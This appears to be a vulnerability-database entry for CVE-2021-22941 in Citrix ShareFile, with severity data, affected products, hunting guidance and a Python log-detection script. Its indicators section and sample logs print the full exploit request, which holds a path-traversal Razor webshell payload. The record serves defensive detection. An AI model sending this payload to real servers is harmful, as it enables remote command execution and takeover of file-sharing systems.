CVE-2021-22941
published 2021-09-23

Priority: P1 97 · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Ransomware
CISA Known Exploited Vulnerability (due 2022-04-15)
Exploited in the wild
EPSS: 53.59% (98.9th percentile)
Improper Access Control in Citrix ShareFile storage zones controller before 5.11.20 may allow an unauthenticated attacker to remotely compromise the storage zones controller.

Affected (9 ranges)

Vendor   Product                            Version range   Fixed in
citrix   citrix_adm
citrix   citrix_hypervisor
citrix   citrix_virtual_apps_and_desktops
citrix   endpoint_management
citrix   netscaler_adc
citrix   netscaler_gateway
citrix   sharefile
citrix   sharefile_storagezones_controller  < 5.11.20       5.11.20
citrix   xenserver

Detection & IOCs (extracted from sources)

url: /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123
path: /../../ConfigService\Views\Shared\Error.cshtml
path: /upload.aspx
command: uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}
filename: Error.cshtml
  • Hunt IIS access logs for POST requests to /upload.aspx containing encoded path traversal strings for ../ and ConfigService\Views\Shared\Error.cshtml in URL parameters
  • Flag requests to /upload.aspx that include the default exploit parameters &bp=123&accountid=123, which are present in publicly available CVE-2021-22941 PoC exploits when the attacker has not customized the payload
  • The exploit delivers a Razor-syntax ASP.NET webshell via the uploadid parameter using Process.Start(cmd,arg) for arbitrary command execution; detect creation or modification of Error.cshtml under ConfigService\Views\Shared\
  • The vulnerability allows an adversary to overwrite an existing file on a target server via an uploadid parameter passed in an HTTP GET request; monitor for unexpected writes to .cshtml files in the ShareFile web root
  • The default exploit parameters bp=123&accountid=123 are only present when the attacker has not customized the payload; absence of these values does not rule out exploitation
  • Fully weaponized exploits for CVE-2021-22941 proliferated since mid-October 2021, meaning a wide variety of attacker tooling may produce different request signatures beyond the observed python-requests user agent
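Detection logic for the IIS-log hunt described in the bullets above, as an added example that is not part of this record or of any vendor tooling. The log lines are constructed, and the field order (date time cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)) is an assumption about the W3C logging configuration; decoding is applied twice so double-encoded traversal is not missed.

```python
"""Flag /upload.aspx requests carrying the CVE-2021-22941 traversal or webshell markers."""
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus

# Constructed sample lines (not real log data); assumed W3C field order:
# date time cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
SAMPLE_LOG = """\
2021-10-20 08:01:12 POST /upload.aspx uploadid=%40using+System.Diagnostics%3B%40%7BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 200 python-requests/2.26.0
2021-10-20 08:01:13 GET /upload.aspx uploadid=..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=7&accountid=42 200 Mozilla/5.0
2021-10-20 08:02:00 POST /upload.aspx uploadid=9f1c&bp=123&accountid=123 200 Mozilla/5.0
2021-10-20 08:03:45 GET /ConfigService/Views/Shared/Error.cshtml - 200 Mozilla/5.0
2021-10-20 08:04:10 POST /upload.aspx uploadid=abc123&bp=55&accountid=9 200 Mozilla/5.0
"""


def decode_query(query: str) -> str:
    """URL-decode twice so double-encoded traversal (%252F) is also normalised."""
    return unquote_plus(unquote_plus(query)).lower()


def classify(line: str) -> Optional[str]:
    """'high' for traversal into Error.cshtml or a Razor/Process.Start payload,
    'low' for the default PoC parameters only, None for everything else."""
    parts = line.split(" ", 6)
    if len(parts) < 6:
        return None
    stem, query = parts[3], parts[4]
    if stem.lower() != "/upload.aspx":
        return None
    q = decode_query(query)
    traversal = "../" in q or "..\\" in q
    target = "views\\shared\\error.cshtml" in q or "views/shared/error.cshtml" in q
    webshell = "process.start" in q or "@using" in q
    if (traversal and target) or webshell:
        return "high"
    if "bp=123" in q and "accountid=123" in q:
        return "low"  # weak signal: default PoC values, see caveat above
    return None


def hunt(log_text: str) -> List[Tuple[int, str]]:
    """Return (line_number, severity) for every suspicious request in the log."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        sev = classify(line)
        if sev:
            hits.append((n, sev))
    return hits


if __name__ == "__main__":
    for n, sev in hunt(SAMPLE_LOG):
        print(f"line {n}: {sev}")
```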

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     9.8    CRITICAL  CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     10.0   CRITICAL  AV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck           10.0   CRITICAL
cisa                9.8    CRITICAL